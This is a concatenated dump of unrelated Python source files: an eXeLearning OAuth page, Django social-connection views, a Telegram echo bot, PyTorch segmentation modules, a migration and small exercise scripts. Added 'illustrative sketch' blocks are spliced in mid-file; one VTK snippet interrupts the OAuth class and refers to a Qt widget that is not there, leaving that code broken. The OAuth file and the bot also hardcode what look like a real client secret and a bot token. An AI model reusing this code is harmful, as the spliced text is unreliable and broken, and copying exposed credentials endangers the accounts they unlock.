'5ESrTI1QXb971YdZk22t5XOWCRWOuzHRV1L1Ho8aOl7NuTFN'\n BASE_URL = 'https://procomun.educalab.es'\n REDIRECT_URI = 'http://localhost:51235/oauth/procomun/callback'\n AUTHORIZATION_BASE_URL = BASE_URL + '/oauth2/authorize'\n TOKEN_URL = BASE_URL + '/oauth2/token'\n name = 'procomun'\n _templateFileName = 'oauth.html'\n\n def __init__(self, parent):\n Renderable.__init__(self, parent)\n rend.Page.__init__(self)\n self.states = {}\n\n def child_callback(self, ctx):\n return self\n\n def saveState(self, state, oauth2Session, client):\n self.states[state] = (oauth2Session, client)\n\n def render_start(self, ctx, data):\n request = inevow.IRequest(ctx)\n state = self.states.get(request.args.get('state', [None])[0])\n script = (\n '''top.Ext.getCmp('oauthprocomun').close()'''\n )\n if state:\n code = request.args.get('code', [None])[0]\n oauth2Session, client = state\n script = ''\n try:\n client.session.oauthToken['procomun'] = oauth2Session.fetch_token(self.TOKEN_URL, client_secret=self.CLIENT_SECRET, code=code)\n script = ('''\n top.Ext.getCmp('oauthprocomun').hide();\n top.eXe.app.getController(\"Toolbar\").exportProcomun();\n top.Ext.getCmp('oauthprocomun').close();\n ''')\n except InvalidClientError:\n script = '''\n top.Ext.getCmp('oauthprocomun').hide();\n top.eXe.app.getController(\"Toolbar\").showOAuthError(\"%s\");\n top.Ext.getCmp('oauthprocomun').close();\n ''' % client.packageName\n # This exception is raised when the user clicks the Cancel button\n except ValueError:\n script = '''\n top.Ext.getCmp('oauthprocomun').close();\n '''\n\n return ctx.tag()[script]\n\n\nclass GDriveOauth(Renderable, rend.Page):\n 
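# ---- Illustrative sketch (added; not part of the original source) ----
# The Qt widget above wraps a plain VTK pipeline. The same pipeline without
# Qt (assumes a local unstructured-grid file 'mesh.vtk' exists; Start()
# blocks until the interactor window is closed):
import vtk

reader = vtk.vtkUnstructuredGridReader()
reader.SetFileName('mesh.vtk')

surface = vtk.vtkDataSetSurfaceFilter()      # unstructured grid -> polydata
surface.SetInputConnection(reader.GetOutputPort())

mapper = vtk.vtkDataSetMapper()
mapper.SetInputConnection(surface.GetOutputPort())

actor = vtk.vtkActor()
actor.SetMapper(mapper)

ren = vtk.vtkRenderer()
ren.AddActor(actor)
window = vtk.vtkRenderWindow()
window.AddRenderer(ren)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(window)
window.Render()
iren.Start()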
name = 'gdrive'\n _templateFileName = 'oauth.html'\n\n def __init__(self, parent):\n Renderable.__init__(self, parent)\n rend.Page.__init__(self)\n\n def render_start(self, ctx, data):\n script = ('''\n <html>\n <head>\n <title>Export Package to Google Drive\n \n \n \n
Export Package to Google Drive
\n \n ''')\n return ctx.tag()[script]\n\n\nclass OauthPage(Renderable, rend.Page):\n name = 'oauth'\n _templateFileName = 'oauth.html'\n\n def __init__(self, parent):\n parent.putChild(self.name, self)\n Renderable.__init__(self, parent)\n rend.Page.__init__(self)\n self.procomun = ProcomunOauth(self)\n\n def child_procomun(self, ctx):\n return self.procomun","repo_name":"exelearning/iteexe","sub_path":"exe/webui/oauthpage.py","file_name":"oauthpage.py","file_ext":"py","file_size_in_byte":4200,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"61"} +{"seq_id":"35376094751","text":"import csv\n\ntotal = 12629\n\nfile = open('summary.csv','w')\nwriter = csv.writer(file)\n\nwriter.writerow(['nat', 'adv'])\n\nfor i in range(0, 3):\n\n\twith open('data_' + str(i) + '_nat.csv') as file_obj:\n\n\t\treader_obj = csv.reader(file_obj)\n\n\t\tcorrect_nat = 0\n\n\t\tfor row in reader_obj:\n\t\t\tif row[2] == row[3]:\n\t\t\t\tcorrect_nat += 1\n\n\twith open('data_' + str(i) + '_adv.csv') as file_obj:\n\n\t\treader_obj = csv.reader(file_obj)\n\n\t\tcorrect_adv = 0\n\n\t\tfor row in reader_obj:\n\t\t\tif row[2] == row[3]:\n\t\t\t\tcorrect_adv += 1\n\n\twriter.writerow([str(correct_nat), str(correct_adv)])\n\n","repo_name":"yyou22/Traffic_Sign_Data_Preparation","sub_path":"summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33416628873","text":"\"\"\"Initial Migration\n\nRevision ID: d196cfe04b62\nRevises: 4a32527db6b0\nCreate Date: 2022-02-08 22:48:20.482957\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd196cfe04b62'\ndown_revision = '4a32527db6b0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('comments',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=255), nullable=True),\n sa.Column('description', sa.String(length=255), nullable=True),\n sa.Column('pitch_id', sa.Integer(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['pitch_id'], ['pitches.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.add_column('pitches', sa.Column('category', sa.String(length=255), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
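# ---- Illustrative sketch (added; not part of the original source) ----
# ProcomunOauth above completes an OAuth2 authorization-code flow with
# requests-oauthlib. Both halves of that flow in one place (client id,
# secret and URLs below are placeholders; `code` arrives on the redirect
# callback, so the exchange is shown commented out):
from requests_oauthlib import OAuth2Session

client_id, client_secret = 'my-client-id', 'my-client-secret'
redirect_uri = 'http://localhost:51235/oauth/procomun/callback'

oauth = OAuth2Session(client_id, redirect_uri=redirect_uri)
authorization_url, state = oauth.authorization_url(
    'https://procomun.educalab.es/oauth2/authorize')
# 1. send the user to authorization_url and remember `state`
# 2. on the callback, exchange the returned `code` for a token:
# token = oauth.fetch_token('https://procomun.educalab.es/oauth2/token',
#                           client_secret=client_secret, code=code)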
###\n op.drop_column('pitches', 'category')\n op.drop_table('comments')\n # ### end Alembic commands ###\n","repo_name":"GraceMwende/Pitches","sub_path":"migrations/versions/d196cfe04b62_initial_migration.py","file_name":"d196cfe04b62_initial_migration.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33529528109","text":"#!/usr/bin/python3\n\"\"\" This module prints a square with the character # \"\"\"\n\n\ndef print_square(size):\n \"\"\" This function prints a square of size \"\"\"\n if type(size) is not int:\n raise TypeError(\"size must be an integer\")\n if size < 0:\n raise ValueError(\"size must be >= 0\")\n string = (((\"#\" * size) + \"\\n\") * size)\n if string != \"\":\n string = string[:-1]\n print(string)\n","repo_name":"maybe-william/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/4-print_square.py","file_name":"4-print_square.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43720614695","text":"import sys\n\nplayer = []\n\n\n# Set Number of Players\ndef num_players(p_names):\n global player\n for name in p_names:\n player.append([name, 0])\n\n\n# Set Score Calculator\ndef score_calc():\n global player\n game_over = 0\n while game_over < 9:\n for i in player:\n i[1] += int(input(i[0] + \" Score:\"))\n print(player)\n game_over += 1\n\n\n# Display Winner\ndef display_winner():\n global player\n player.sort(key=lambda x: x[1])\n print(\"\\n\\nGAME OVER\\n\\n\")\n print(\"Winner is \" + player[0][0])\n\n\n# Main Function\ndef main():\n global player\n del sys.argv[0]\n num_players(sys.argv)\n score_calc()\n display_winner()\n\n\n# Run Main\nif __name__ == '__main__':\n main()\n","repo_name":"Scepticae/My-Coding-Projects","sub_path":"Personal Projects/ScoreKeeper/scoreKeeper.py","file_name":"scoreKeeper.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39836779248","text":"# https://open.kattis.com/problems/yikes\n# Wrong Answer on TC 2 - reason unknown as of contest end\n\nTC = int(input())\n\nfor _ in range(TC):\n M,B,D,T = [float(i) for i in input().split()]\n\n maxL = T+ 4.5/M\n maxR = T+ 5.5/M\n\n #print(M,B,D,T, 'MAX!!', maxL,maxR)\n\n if maxR < D/B:\n print(\"Max beats the first bicycle\")\n continue\n\n for bike in range(10):\n m_D = D + 4*bike\n mL = m_D/B\n mR = (m_D+2)/B\n #print(mL, mR)\n # if his crossing is not out of range with the bike\n if not (maxL > mR or maxR < mL):\n print(\"Collision with bicycle\", bike+1)\n break\n # if he crosses\n elif maxL > mR:\n if bike == 9 or maxR < (m_D+4)/B:\n print(\"Max crosses safely after bicycle\", bike+1)\n break","repo_name":"jeffreyyun/CompetitiveProgrammingProblems","sub_path":"ICPC_Notes/icpc_kattis_2017Fall/yikesbikes.py","file_name":"yikesbikes.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7562213043","text":"from telegram import Bot\nfrom telegram.ext import Updater, MessageHandler, Filters\n\ntoken = '5708454167:AAGp2GFfRpeuSEZF9RTo9O5tEAyanFT3Hq8'\n\nbot = Bot(token)\nupdater = Updater(token)\ndispatcher = updater.dispatcher\n\ndef start(update, context):\n text = update.message.text\n\n if 'абв' in text.lower():\n 
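# ---- Illustrative sketch (added; not part of the original source) ----
# The yikes solution above decides "collision" with the standard closed-
# interval overlap test: [a1, a2] and [b1, b2] intersect unless one lies
# entirely to the left of the other. In isolation:
def overlaps(a1, a2, b1, b2):
    return not (a1 > b2 or a2 < b1)

assert overlaps(1.0, 2.0, 1.5, 3.0)
assert not overlaps(1.0, 2.0, 2.5, 3.0)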
context.bot.send_message(update.effective_chat.id, text.replace('абв', ''))\n else:\n context.bot.send_message(update.effective_chat.id, text)\n\nstart_handler = MessageHandler(Filters.text, start)\n\ndispatcher.add_handler(start_handler)\n\nupdater.start_polling()\nupdater.idle()","repo_name":"DimPin/lessons-python","sub_path":"homework-9/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22039147320","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\nfrom social.models import UserProfile, Notification\nfrom .models import ConnectionsList, ForgeLink\nfrom social.forms import UserProfileForm\nfrom django.template.loader import render_to_string\nfrom django.contrib.auth.decorators import login_required\nfrom django.conf import settings\nfrom django.core.files import File\nfrom django.db.models import Q\nfrom chat.models import singleOneToOneRoom, Connected\nfrom channels.layers import get_channel_layer\nfrom asgiref.sync import async_to_sync\nimport cv2\nfrom .utils import (\n is_ajax, convertDimensions,\n save_Base64_Temp_ImageString,\n get_forge_link_or_false,\n prune_presence,\n)\nfrom django.contrib.auth import get_user_model\n\nUser = get_user_model()\n\n\ndef getUserProfileForm(request, profile_slug):\n payload = {}\n try:\n profile = UserProfile.objects.get(profile_slug=profile_slug)\n except UserProfile.DoesNotExists():\n payload[\"error\"] = \"Something went wrong with getting your profile. Try later....\"\n form = UserProfileForm(request.POST or None, instance=profile)\n if is_ajax(request=request):\n if request.method == \"GET\":\n context = {\"form\": form, }\n template = render_to_string(\n \"connection/profile_update.html\", context, request=request)\n return JsonResponse({\"template\": template, \"profileUrl\": profile.avatar.url})\n else:\n if form.is_valid():\n # getting the changed field name\n field_name = None\n field_value = None\n if len(form.changed_data) > 0:\n field_name = form.changed_data[0]\n field_obj = UserProfile._meta.get_field(field_name)\n # get the new value of the field\n field_value = field_obj.value_from_object(profile)\n form.save()\n payload[\"success\"] = True\n payload[\"new_value\"] = field_value\n payload[\"field_name\"] = field_name\n payload[\"max_size\"] = settings.MAX_SIZE_FOR_UPLOAD\n else:\n payload[\"success\"] = False\n return JsonResponse(payload)\n\n\n@login_required\ndef crop_image(request):\n payload = {}\n user = request.user\n if request.method == \"POST\" and is_ajax(request=request):\n try:\n # getting the image from the ajax\n image = request.POST.get(\"imageString\")\n url = save_Base64_Temp_ImageString(\n image) # save the image temporarly\n cropX = convertDimensions(request.POST.get(\"cropX\"))\n cropY = convertDimensions(request.POST.get(\"cropY\"))\n cropWidth = convertDimensions(request.POST.get(\"cropWidth\"))\n cropHeight = convertDimensions(request.POST.get(\"cropHeight\"))\n\n img = cv2.imread(url)\n if cropX < 0:\n cropX = 0\n if cropY < 0:\n cropY = 0\n\n cropped_image = img[cropY:cropY+cropHeight, cropX:cropX+cropWidth]\n cv2.imwrite(url, cropped_image)\n user.profile.avatar.save(\n f\"{user.id}_profile_image.png\", File(open(url, \"rb\")))\n payload[\"success\"] = True\n payload[\"profile_url\"] = user.profile.avatar.url\n except Exception as e:\n payload[\"success\"] = False\n payload[\"error\"] = e\n return 
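# ---- Illustrative sketch (added; not part of the original source) ----
# crop_image above crops with plain numpy slicing after clamping negative
# offsets; OpenCV images are arrays indexed [y, x]. The crop step alone:
import numpy as np

img = np.arange(10 * 10).reshape(10, 10)
x, y, w, h = -2, 3, 5, 4
x, y = max(x, 0), max(y, 0)           # same clamping as in the view
cropped = img[y:y + h, x:x + w]
assert cropped.shape == (4, 5)        # rows 3..6, columns 0..4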
JsonResponse(payload)\n\n\n@login_required\ndef Sending_Link_Forge(request):\n payload = {}\n user = request.user\n if is_ajax(request=request) and request.method == \"POST\":\n receiver_profile_slug = request.POST.get(\"profile_slug\")\n receiver = UserProfile.objects.get(\n profile_slug=receiver_profile_slug).user\n try: # Getting a cancelled request if exists and setting it active again\n old_Link = ForgeLink.objects.get(sender=user, receiver=receiver)\n if old_Link:\n if not old_Link.is_active:\n old_Link.is_active = True # Setting it back to True\n old_Link.save()\n payload[\"success\"] = True\n payload[\"profile_owner\"] = receiver.username\n channel_layer = get_channel_layer()\n room_name = f\"comment_or_post_listener_{receiver.id}\"\n new_notif = Notification.objects.create(\n user_from=user, user_to=receiver,\n message=\"sent you a connection request\",\n type_off=5\n )\n async_to_sync(channel_layer.group_send)(\n room_name,\n {\n \"type\": \"send_notification_to_post_author\",\n \"liker\": new_notif.user_from.username,\n \"notification\": new_notif.message,\n \"avatar_url\": new_notif.user_from.profile.avatar.url,\n \"date_notif\": new_notif.date_sent,\n \"notif_type\": new_notif.type_off,\n }\n )\n else:\n payload[\"error\"] = \"You have already sent a link request to this user\"\n else: # means there is not old request at all\n new_con = ForgeLink.objects.create(\n sender=user, receiver=receiver)\n new_con.save()\n payload[\"success\"] = True\n payload[\"profile_owner\"] = receiver.username\n except ForgeLink.DoesNotExist:\n new_con = ForgeLink.objects.create(\n sender=user, receiver=receiver)\n new_con.save()\n # hangle the notification to the receiver......\n channel_layer = get_channel_layer()\n room_name = f\"comment_or_post_listener_{receiver.id}\"\n new_notif = Notification.objects.create(\n user_from=user, user_to=receiver,\n message=\"sent you a connection request\",\n type_off=5\n )\n async_to_sync(channel_layer.group_send)(\n room_name,\n {\n \"type\": \"send_notification_to_post_author\",\n \"liker\": new_notif.user_from.username,\n \"notification\": new_notif.message,\n \"avatar_url\": new_notif.user_from.profile.avatar.url,\n \"date_notif\": new_notif.date_sent,\n \"notif_type\": new_notif.type_off,\n }\n )\n payload[\"success\"] = True\n payload[\"profile_owner\"] = receiver.username\n return JsonResponse(payload)\n\n\n@login_required\ndef cancelForgeLink(request):\n payload = {}\n if is_ajax(request=request) and request.method == \"POST\":\n profile_slug = request.POST.get('profile_slug')\n receiver = UserProfile.objects.get(profile_slug=profile_slug).user\n try:\n link = ForgeLink.objects.get(\n sender=request.user, receiver=receiver, is_active=True)\n if link:\n link.is_active = False\n link.save()\n payload[\"success\"] = True\n except ForgeLink.DoesNotExist:\n payload[\"error\"] = \"Sorry! Impossible to cancel this request now. Try later!!!\"\n return JsonResponse(payload)\n\n\n@login_required\ndef deleteForgeLink(request):\n payload = {}\n if is_ajax(request=request) and request.method == \"POST\":\n request_id = request.POST.get('request_id')\n try:\n link = ForgeLink.objects.get(id=request_id)\n if link:\n link.decline()\n link.save()\n payload[\"success\"] = True\n except ForgeLink.DoesNotExist:\n payload[\"error\"] = \"Sorry! Impossible to delete this request now. 
Try later!!!\"\n return JsonResponse(payload)\n\n\n@login_required\ndef acceptForgeLink(request):\n payload = {}\n if is_ajax(request=request) and request.method == \"POST\":\n request_id = request.POST.get(\"request_id\")\n try:\n link = ForgeLink.objects.get(pk=request_id)\n link.accept()\n link.save()\n # creating the chat room for these 2 new connected users\n user1, user2 = link.sender, link.receiver\n\n q_filter = Q(first_user=user1, second_user=user2) | Q(\n first_user=user2, second_user=user1)\n qs = singleOneToOneRoom.objects.filter(q_filter).exists()\n if not qs:\n chat_room = f\"room-{user1.id}-{user2.id}\"\n singleOneToOneRoom.objects.create(\n first_user=user1, second_user=user2, room_name=chat_room)\n payload[\"success\"] = True\n # notify the user about the request acceptance\n channel_layer = get_channel_layer()\n room_name = f\"comment_or_post_listener_{user1.id}\"\n new_notif = Notification.objects.create(\n user_from=user2, user_to=user1,\n message=\"has accepted your connection request\",\n type_off=4\n )\n async_to_sync(channel_layer.group_send)(\n room_name,\n {\n \"type\": \"send_notification_to_post_author\",\n \"liker\": new_notif.user_from.username,\n \"notification\": new_notif.message,\n \"avatar_url\": new_notif.user_from.profile.avatar.url,\n \"date_notif\": new_notif.date_sent,\n \"notif_type\": new_notif.type_off,\n }\n )\n payload[\"sender\"] = link.sender.username\n except ForgeLink.DoesNotExist:\n payload[\"error\"] = \"Cannot accept this request now. Please Try later !!\"\n return JsonResponse(payload)\n\n\n@login_required\ndef Unlink(request):\n payload = {}\n user = request.user\n if is_ajax(request=request) and request.method == 'POST':\n removee_id = request.POST.get(\"removee_id\")\n # need to check if the removee is inside of the list of connections\n # first before making the remove action. Use the areLinked method\n removee = User.objects.get(pk=removee_id)\n try:\n link = ConnectionsList.objects.get(user=user)\n if link.areLinked(removee): # just a simple check\n link.unlink(removee)\n payload[\"success\"] = True\n payload[\"sender\"] = removee.username\n else:\n payload[\"error\"] = f\"You can only remove a user within your connections\"\n except ConnectionsList.DoesNotExist:\n payload[\"error\"] = f\"Cannot unlink {removee.username} now. 
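# ---- Illustrative sketch (added; not part of the original source) ----
# acceptForgeLink guards room creation with a symmetric Q filter because
# f"room-{user1.id}-{user2.id}" depends on argument order. An alternative
# (not what the view does) is to canonicalise the pair once, so both
# orderings map to the same key:
def room_key(id_a, id_b):
    lo, hi = sorted((id_a, id_b))
    return 'room-{}-{}'.format(lo, hi)

assert room_key(7, 3) == room_key(3, 7) == 'room-3-7'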
Please try later!\"\n return JsonResponse(payload)\n\n\ndef cleanUnreadNotif(request):\n current_user = request.user\n if is_ajax(request=request):\n type_of = request.GET.get(\"type_of\", None)\n if type_of == \"msg\":\n notifs = Notification.objects.filter(\n user_to=current_user, seen=False, type_off=6)\n for notif in notifs:\n notif.seen = True\n notif.save()\n else:\n notifs = Notification.objects.filter(\n user_to=current_user, seen=False).exclude(type_off=6)\n for notif in notifs:\n notif.seen = True\n notif.save()\n\n return JsonResponse({\"success\": True})\n\n\ndef prunePresenceAjaxView(request):\n if is_ajax(request=request):\n if request.user.is_authenticated:\n # need to get the room name or what\n cons = Connected.objects.filter(user=request.user)\n if cons:\n prune_presence(cons)\n else:\n return JsonResponse({})\n return JsonResponse({'success': True})\n","repo_name":"SahineDiallo/SpiderNetwork","sub_path":"Connection/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30712121702","text":"# btech work \n\nimport torch\nimport torch.nn as nn\nfrom torchvision import models\nimport torch.nn.functional as F\nfrom torchsummary import summary \nfrom functools import partial\nfrom tensorboardX import SummaryWriter\nimport numpy as np\nimport pdb\n\n\n# writer = SummaryWriter()\n\nnonlinearity = partial(F.relu, inplace=True)\n\nclass DACblock(nn.Module):\n def __init__(self, channel):\n super(DACblock, self).__init__()\n self.dilate1 = nn.Conv2d(channel, channel, kernel_size=3, dilation=1, padding=1)\n self.dilate2 = nn.Conv2d(channel, channel, kernel_size=3, dilation=3, padding=3)\n self.dilate3 = nn.Conv2d(channel, channel, kernel_size=3, dilation=5, padding=5)\n self.conv1x1 = nn.Conv2d(channel, channel, kernel_size=1, dilation=1, padding=0)\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n if m.bias is not None:\n m.bias.data.zero_() \n\n def forward(self, x):\n dilate1_out = nonlinearity(self.dilate1(x))\n dilate2_out = nonlinearity(self.conv1x1(self.dilate2(x)))\n dilate3_out = nonlinearity(self.conv1x1(self.dilate2(self.dilate1(x))))\n dilate4_out = nonlinearity(self.conv1x1(self.dilate3(self.dilate2(self.dilate1(x)))))\n out = x + dilate1_out + dilate2_out + dilate3_out + dilate4_out\n return out\n\nclass SPPblock(nn.Module):\n def __init__(self, in_channels):\n super(SPPblock, self).__init__()\n self.pool1 = nn.MaxPool2d(kernel_size=[2, 2], stride=2)\n self.pool2 = nn.MaxPool2d(kernel_size=[3, 3], stride=3)\n self.pool3 = nn.MaxPool2d(kernel_size=[5, 5], stride=5)\n self.pool4 = nn.MaxPool2d(kernel_size=[6, 6], stride=6)\n\n self.conv = nn.Conv2d(in_channels=in_channels, out_channels=1, kernel_size=1, padding=0)\n\n def forward(self, x):\n self.in_channels, h, w = x.size(1), x.size(2), x.size(3)\n self.layer1 = F.upsample(self.conv(self.pool1(x)), size=(h, w), mode='bilinear')\n self.layer2 = F.upsample(self.conv(self.pool2(x)), size=(h, w), mode='bilinear')\n self.layer3 = F.upsample(self.conv(self.pool3(x)), size=(h, w), mode='bilinear')\n self.layer4 = F.upsample(self.conv(self.pool4(x)), size=(h, w), mode='bilinear')\n\n out = torch.cat([self.layer1, self.layer2, self.layer3, self.layer4, x], 1)\n\n return out\n\n\nclass mod_SPPblock(nn.Module):\n def __init__(self, in_channels):\n super(SPPblock, self).__init__()\n self.pool1 = nn.MaxPool2d(kernel_size=[2, 2], stride=2)\n self.pool2 = 
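# ---- Illustrative sketch (added; not part of the original source) ----
# Every branch in DACblock pairs kernel_size=3, dilation=d, padding=d,
# which keeps H and W unchanged (effective kernel 2d+1, padded by d on each
# side), so the branch outputs can be summed with the input. Shape check:
import torch
import torch.nn as nn

x = torch.randn(1, 8, 32, 32)
for d in (1, 3, 5):
    conv = nn.Conv2d(8, 8, kernel_size=3, dilation=d, padding=d)
    assert conv(x).shape == x.shape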
nn.MaxPool2d(kernel_size=[3, 3], stride=3)\n self.pool3 = nn.MaxPool2d(kernel_size=[5, 5], stride=5)\n self.pool4 = nn.MaxPool2d(kernel_size=[6, 6], stride=6)\n\n self.conv = nn.Conv2d(in_channels=in_channels, out_channels=1, kernel_size=1, padding=0)\n\n def forward(self, x):\n self.in_channels, h, w = x.size(1), x.size(2), x.size(3)\n self.layer1 = F.upsample(self.conv(self.pool1(x)), size=(h, w), mode='bilinear')\n self.layer2 = F.upsample(self.conv(self.pool2(x)), size=(h, w), mode='bilinear')\n self.layer3 = F.upsample(self.conv(self.pool3(x)), size=(h, w), mode='bilinear')\n self.layer4 = F.upsample(self.conv(self.pool4(x)), size=(h, w), mode='bilinear')\n out = self.layer1 + self.layer2 + self.layer3 + self.layer4\n return out\n\n\nclass DecoderBlock(nn.Module):\n def __init__(self, in_channels, n_filters):\n super(DecoderBlock, self).__init__()\n\n self.conv1 = nn.Conv2d(in_channels, in_channels // 4, 1)\n self.norm1 = nn.BatchNorm2d(in_channels // 4)\n self.relu = nn.ReLU()\n\n self.deconv2 = nn.ConvTranspose2d(in_channels // 4, in_channels // 4, 3, stride=2, padding=1, output_padding=1)\n self.norm2 = nn.BatchNorm2d(in_channels // 4)\n \n self.conv3 = nn.Conv2d(in_channels // 4, n_filters, 1)\n self.norm3 = nn.BatchNorm2d(n_filters)\n\n def forward(self, x): \n x = self.conv1(x)\n x = self.norm1(x)\n x = self.relu(x)\n \n x = self.deconv2(x)\n x = self.norm2(x)\n x = self.relu(x)\n\n x = self.conv3(x)\n x = self.norm3(x)\n x = self.relu(x)\n return x\n\ndef freeze_layer(layer):\n for param in layer.parameters():\n param.requires_grad = False\n\ndef adjustpad_cat(x1,x2): \n # input is CHW \n diffY = x2.size()[2] - x1.size()[2]\n diffX = x2.size()[3] - x1.size()[3] \n x1 = F.pad(x1, [diffX // 2, diffX - diffX // 2,\n diffY // 2, diffY - diffY // 2])\n # if you have padding issues, see\n # https://github.com/HaiyongJiang/U-Net-Pytorch-Unstructured-Buggy/commit/0e854509c2cea854e247a9c615f175f76fbb2e3a\n # https://github.com/xiaopeng-liao/Pytorch-UNet/commit/8ebac70e633bac59fc22bb5195e513d5832fb3bd\n x = torch.cat([x2, x1], dim=1)\n return x \n\ndef adjustpad_add(x1,x2): \n # input is CHW \n diffY = x2.size()[2] - x1.size()[2]\n diffX = x2.size()[3] - x1.size()[3] \n x1 = F.pad(x1, [diffX // 2, diffX - diffX // 2,\n diffY // 2, diffY - diffY // 2])\n # if you have padding issues, see\n # https://github.com/HaiyongJiang/U-Net-Pytorch-Unstructured-Buggy/commit/0e854509c2cea854e247a9c615f175f76fbb2e3a\n # https://github.com/xiaopeng-liao/Pytorch-UNet/commit/8ebac70e633bac59fc22bb5195e513d5832fb3bd \n x = x1 + x2 \n return x \n\n\nclass depthwise_separable_conv(nn.Module):\n def __init__(self, nin, nout):\n super(depthwise_separable_conv, self).__init__()\n self.depthwise = nn.Conv2d(nin, nin, kernel_size=3, padding=1, groups=nin)\n self.pointwise = nn.Conv2d(nin, nout, kernel_size=1)\n\n def forward(self, x):\n # print(x.shape)\n out = self.depthwise(x)\n out = self.pointwise(out)\n return out \n\n\nclass double_depth_conv(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(double_depth_conv, self).__init__()\n self.depth = nn.Sequential(\n depthwise_separable_conv(in_ch, out_ch),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True),\n depthwise_separable_conv(out_ch, out_ch),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True)\n )\n self.conv1 = nn.Sequential( \n nn.Conv2d(in_ch, out_ch, kernel_size = 1),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, x):\n x = self.depth(x) + self.conv1(x) # for_high_dimensional feature maps\n # print(x.shape)\n # x = 
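# ---- Illustrative sketch (added; not part of the original source) ----
# depthwise_separable_conv above factors a 3x3 convolution into a
# per-channel 3x3 (groups=nin) plus a 1x1 pointwise mix, which cuts the
# parameter count sharply:
import torch.nn as nn

def n_params(m):
    return sum(p.numel() for p in m.parameters())

nin, nout = 64, 128
standard = nn.Conv2d(nin, nout, 3, padding=1)
separable = nn.Sequential(nn.Conv2d(nin, nin, 3, padding=1, groups=nin),
                          nn.Conv2d(nin, nout, 1))
print(n_params(standard), n_params(separable))   # 73856 vs 8960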
self.depth(x) \n return x \n\nclass DACblock_mod(nn.Module):\n def __init__(self, channel):\n super(DACblock_mod, self).__init__()\n self.dilate1 = nn.Conv2d(channel, channel, kernel_size=3, dilation=1, padding=1)\n self.dilate2 = nn.Conv2d(channel, channel, kernel_size=3, dilation=3, padding=3)\n self.dilate3 = nn.Conv2d(channel, channel, kernel_size=3, dilation=5, padding=5)\n self.conv1x1 = nn.Conv2d(channel, channel, kernel_size=1, dilation=1, padding=0)\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n if m.bias is not None:\n m.bias.data.zero_() \n\n def forward(self, x):\n dilate1_out = nonlinearity(self.dilate1(x))\n dilate2_out = nonlinearity(self.conv1x1(self.dilate2(x)))\n dilate3_out = nonlinearity(self.conv1x1(self.dilate2(self.dilate1(x))))\n dilate4_out = nonlinearity(self.conv1x1(self.dilate3(self.dilate2(self.dilate1(x)))))\n out = x + dilate1_out + dilate2_out + dilate3_out + dilate4_out\n return out\n\n\n###### original double convolution module\n# class double_conv(nn.Module):\n# def __init__(self, in_ch, out_ch):\n# super(double_conv, self).__init__()\n# self.conv = nn.Sequential(\n# nn.Conv2d(in_ch, out_ch, kernel_size=3, padding=1),\n# nn.BatchNorm2d(out_ch),\n# nn.ReLU(inplace=True),\n# nn.Conv2d(out_ch, out_ch, kernel_size=3, padding=1),\n# nn.BatchNorm2d(out_ch),\n# nn.ReLU(inplace=True)\n# )\n\n# def forward(self, x):\n# x = self.conv(x)\n# return x\n \n \nclass inception(nn.Module):\n def __init__(self, channel):\n super(inception, self).__init__()\n self.dilate1 = nn.Conv2d(channel, channel, kernel_size=1, dilation=1, padding=0)\n\n self.dilate3 = nn.Conv2d(channel, channel, kernel_size=3, dilation=1, padding=1)\n self.conv1x1 = nn.Conv2d(2 * channel, channel, kernel_size=1, dilation=1, padding=0)\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n if m.bias is not None:\n m.bias.data.zero_()\n\n def forward(self, x):\n dilate1_out = nonlinearity(self.dilate1(x)) \n dilate2_out = nonlinearity(self.dilate3(self.dilate1(x)))\n dilate_concat = nonlinearity(self.conv1x1(torch.cat([dilate1_out, dilate2_out], 1)))\n dilate3_out = nonlinearity(self.dilate1(dilate_concat))\n out = x + dilate3_out \n return out\n\nclass inconv(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(inconv, self).__init__()\n self.conv = double_depth_conv(in_ch, out_ch)\n\n def forward(self, x):\n x = self.conv(x)\n return x\n\n# changing max pool to strided conv (simplicity) for downsampling \n\nclass down(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(down, self).__init__()\n self.strided_conv = nn.Sequential(\n nn.Conv2d(in_ch, in_ch, 3, 2, 1 